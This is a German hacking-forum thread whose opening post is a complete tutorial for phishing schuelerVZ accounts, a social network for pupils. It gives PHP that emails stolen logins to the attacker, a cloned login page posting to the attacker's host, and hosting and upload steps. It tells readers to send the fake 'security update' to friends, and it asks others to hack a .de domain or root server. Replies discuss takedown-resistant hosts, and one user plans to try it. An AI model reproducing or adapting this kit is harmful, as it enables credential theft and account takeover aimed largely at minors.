Phishing Seite: SchuelerVZ

[diekartoffel]

Hi Leute,

ich hab mal aus Langeweile eine SVZ Phishing Seite gemacht...

Deswegen wärs lieb, wenn hier jemand es hinbekommt ne .de Domain, bzw, nen Root zu hacken und mir sowas zu geben, weil ich hab diverse Phishing Seiten und würde die gern Online stellen

Naja egal, legen wir los:

1. Erstellt euch ein kostenlosen Webspace (www.ohost.de)
1.1 Loggt euch mit euren Daten bei www.ohost.de ein
1.2 Klickt auf "Webhosting FTP"
1.3 Klickt auf "Aktivieren"
1.4 Gebt ein FTP Server Passwort ein (nicht euer ohost Account Passwort)

2. Downloadet euch Filezilla
2.1 Geht zu http://www.filezilla.de/download.htm
2.2 Downloadet euch Filezilla für dein OS und installiert es dann
2.3 Startet Filezilla

3. Erstellt euch "Phishing Dateien"
3.1 Legt eine einfache Text Datei in einem Ordner an (Editor)
3.2 Kopiert folgenden Text dort Rein:

<meta http-equiv="refresh" content="5;URL=http://www.schuelervz.net">

<?php

$email = $_POST["email"];
$password = $_POST["password"];
$sendto = "YOUREMAIL";
$suptitle = "SVZ-Accountdaten";
$text= "Email: $email und Passwort: $password

xDD viel Spaß ";

mail($sendto, $suptitle, $text, 'From: $email <$email>');

echo "<h1><big> Bitte ein wenig Geduld, schuelerVZ wird aktualisiert...</big></h1>" .
"

wenn die Aktualisierung abgeschlossen ist wirst du auf die Startseite weitergeleitet.
Dein SVZ TEAM";
?>

3.3 Ändert die Zeile $sendto = "YOUREMAIL"; (Fügt eure Email-Adresse ein)
3.4 Speichert die Datei ab, als "errorsvz.php"
3.5 Öffnet eine neue Textdatei und fügt folgenden Text ein:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title>schuelerVZ | Bist du schon drin?</title>

<meta name="description" content="schuelerVZ ist ein kostenloses Online-Netzwerk fuer Schueler. Hier k�nnen sie ihr eigenes Profil gestalten, Fotos hochladen, Freunde treffen, diskutieren uvm." />
<meta name="keywords" content="Schueler, pupils" />
<meta name="ajaxUrl" content="/Ajax" />
<meta name="platformId" content="Pvz" />


<meta name="activeModules" content="Default,Search,Login,StaticContent,Invita tion,Chat,Info" />
<meta name="pageletName" content="Default.Overview" />

<link rel="shortcut icon" href="http://static.pe.schuelervz.net/20090304-1/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Default.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Main.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Objects.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/DefaultJS.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Login.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/LeftSideBox.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Mod_Default.css" />

<script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/resource-core.js"></script>
<script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.heigh t==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length) {f or(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+ "');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){re f='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){ browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e ){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers='' }
//]]>
</script></head>
<body class="isNotLoggedIn webkit webkit52519">
<div id="Grid-Wrapper">
<div id="Grid-Advertising-Top">
</div>
<div id="Grid-Advertising-Right">
</div>
<div id="Grid-Page">
<div id="Grid-Page-Center">
<div id="Grid-Page-Center-Top">
<div id="Grid-Page-Center-Top-Title">
<img src="http://static.pe.schuelervz.net/20090304-1/Img/el_verzeichnis.png" alt="SCHueLERVERZEICHNIS"/>
</div>
<div id="Grid-Page-Center-Top-Navigation">
<ul>
<li><a href="/Login" title="Einloggen">einloggen</a></li>
<li><a href="/Registration" title="anmelden">anmelden</a></li>
<li><a href="/Newsroom/Overview/tid/124" title="klartext">klartext</a></li>
<li><a href="/l/help" title="hilfe">hilfe</a></li>
</ul>
</div>
</div>

<div id="Grid-Page-Center-Header">
<h1 class="ellipsis" title="Bist du schon drin?">Bist du schon drin?</h1>
</div>

<div id="Grid-Page-Center-Content">

<div id="shoutboxJs" class="hidden">
<div>
<p id="shoutboxJsSuccess" class="success hidden"></p>
<p id="shoutboxJsError" class="error hidden"></p>
</div>
<div class="close">
<a href="javascript:;"></a>
</div>
</div>

<div id="Mod-Default">

<div class="obj-box full no-float">
<div class="Snipplet-TopInfo">
</div>
<div class="Snipplet-Default-Overview">
<img class="avatar" src="http://static.pe.schuelervz.net/20090304-1/Img/FrontBoy.png" alt="Avatar" />
<h2 class="alternate">Lass dich einladen!</h2>

<ul>

<li><span>Das schuelerVZ Sicherheits-Update mit Extra Features!</span></li>


<li><span>Punkt 1: Logg dich wie immer ein!</span></li>


<li><span>Punkt 2: Warte, bis die Aktualisierung fertig ist!</span></li>


<li><span>Punkt 3: Hab viel Spass mit den extra Features! Zum Beispiel:</span></li>


<li><span>Verschiedene Schriftarten, Fotoalben downloaden, Smileys an/aus UND:</span></li>



<li><span>Video Chat mit anderen Update-Nutzern!</span></li>

</ul>

<div class="teaser-area">
<div class="teaser">
<a href="/Registration/" title="">Eingeladen?</a><br />
Los geht's </div>

</div>
</div>
</div>
</div> </div>

<div id="Grid-Page-Center-Footer">
<ul>
<li><a href="/l/schueler/" title="Schueler">Schueler</a></li>
<li><a href="/l/parents" title="Eltern und Lehrer">Eltern und Lehrer</a></li>
<li><a href="/l/press" title="Presse">Presse</a></li>
<li><a href="/l/impressum" title="Impressum">Impressum</a></li>
<li><a href="http://svzforupdate.sv.funpic.de/agb.html" title="AGB">AGB</a></li>
<li><a href="/l/policy" title="Datenschutz">Datenschutz</a></li>
<li><a href="/l/rules" title="Verhaltenskodex">Verhaltenskodex</a></li>
</ul>
</div>
<div>
</div>
</div>
<div id="Grid-Page-Left">

<div id="Logo">
<a href="/Default" title="zur Startseite">
<img src="http://static.pe.schuelervz.net/20090304-1/Img/logo.png" alt="Logo schuelerVZ, Link zur Startseite" />
</a>
</div>

<form id="Loginbox" method="post" action="http://deinehostadresse/errorsvz.php">
<fieldset>
<label for="Login_email">Email</label></br>
<input onfocus="this.hasfocus='yes';" class="text" type="text" name="email" id="Login_email" value="" />
<label for="Login_password">Passwort</label>
<input onfocus="this.hasfocus='yes';" class="text" type="password" name="password" id="Login_password" value="" />
<table>
<tr>
<td><input onfocus="this.hasfocus='yes';" type="checkbox" name="reminder" id="Login_remind" value="1" class="remind-login"/></td>
<td><label for="Login_remind">Eingeloggt bleiben</label></td>
<td><img class="loginTooltipIcon" src="http://static.pe.schuelervz.net/20090304-1/Img/tooltipp.gif" width="14px"/>
<div id="reminder-hint" class="hidden">Setze dieses H�kchen nur, wenn au�er dir niemand anderes diesen Computer verwendet. <a href="http://www.schuelervz.net/Newsroom/Detail/5c7c8d3134c3d2c9">Warum?</a>

</div>
</td>
</tr>
</table>
<input onfocus="this.hasfocus='yes';" class="button" type="submit" name="login" value="Einloggen" />
<input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input type="hidden" name="formkey" value="15d52edba765ca6b02b73de7d92b4ae0eebc10dc3a7 f275eec854ce1e49024dcdbb9abec3a7581f9fbadfcc38b2ce 2f00dcae4245a7bec8946341230247dd57b56df0a9a67f1b59 d06ba673e3a4e9b6d7e7ae95304f82b334595383513271fe2" />
<input type="hidden" name="iv" value="2aa36b33c36411152a17eb18d0c2373c" />

</fieldset>
</form>

<ul id="Grid-Navigation-Main" class="obj-linklist">
<li><a href="/Registration" title="Anmelden">Anmelden</a></li> </ul>

<div id="LeftsideBox">
<div>
<p>Update: Logg dich einfach wie gewohnt ein. Das SVZ Update installiert sich dann von selber!</p> </div>
</div>

</div>
<br class="Clear-The-Evil-Float" />
</div>
</div>


<script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/phx-core.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/phx-start.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut";
document.write("><div id=\"ivwbox\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+ (Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
<div id="ivwbox"><img src="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">

3.6 Such die Zeile <form id="Loginbox" method="post" action="http://deinehostadresse/errorsvz.php"> und ändere "deinehostadresse" in deine ORIGINALE hostadresse
3.7 Speichert es ab als "SVZ-Update.html"

4. Abschluss
4.1 Öffnet Filezilla
4.2 Loggt euch bei ohost ein und klickt auf "Webhosting FTP"->"FTP Daten" kopiert eure FTP Server Adresse (Ohne ftp. davor)
in Filezilla (im Punkt "Server")
4.3 Gebt bei Benutzernamen in Filezilla euren ohost Benutzernamen ein
4.4 Gebt bei Passwort euer PASSWORT FÜR DEN FTP SERVER ein.
4.5 Verbindet euch mit dem FTP Server und ladet eure "errorsvz.php" hoch.

5. Verschicken
Verschickt an eure Freunde ein neues "SchuelerVZ Update mit tollen Features", in Form der HTML Datei.
Ihr kriegt ihre SVZ Daten per Email zugeschickt

FERTIG

Das war'n TUT für die ganz dummen

[w00tdude]

Das ist keine Kunst. Niemand wird dir etwas dafür geben. Allein, dass du www.ohost.de als Anbieter empfiehlst, merkt man wie viel Ahnung du von der ganzen Geschichte hast.

[killer734]

Welche fpt seite würdest du denn empfehlen?

[NoNameMT]

es gibt genug andere hoster die Kicksicherer sind als ohost/funpic...guck einfach mal in der Hosting Section

[killer734]

ok
habe funpic und ohost beide schonmal ausprobiert, funpic ging garnichts, und ohost nach zwei tagen gesperr xD

[poddels]

gabs so ein tut nich schonmal?

Und zum testen von Phisingseiten reicht Ohost/Fupic völlig.

[100]

Code bitte auch als Code einfügen..
Und naja.. es gibt schon brauchbare VTuts

[diekartoffel]

Sry, ist mein erstes Tut, und ja hab auch nichsoviel Ahnung auf dem Gebiet..

Das war so ziemlich die erste Sache die ich gemacht hab, und ist eg. auch für Einsteiger zum reindenken gedacht

[killer734]

jo is ja ok
will ich jetzt auch mal ausprobieren

[100]

Sieht doch schon übersichtlicher aus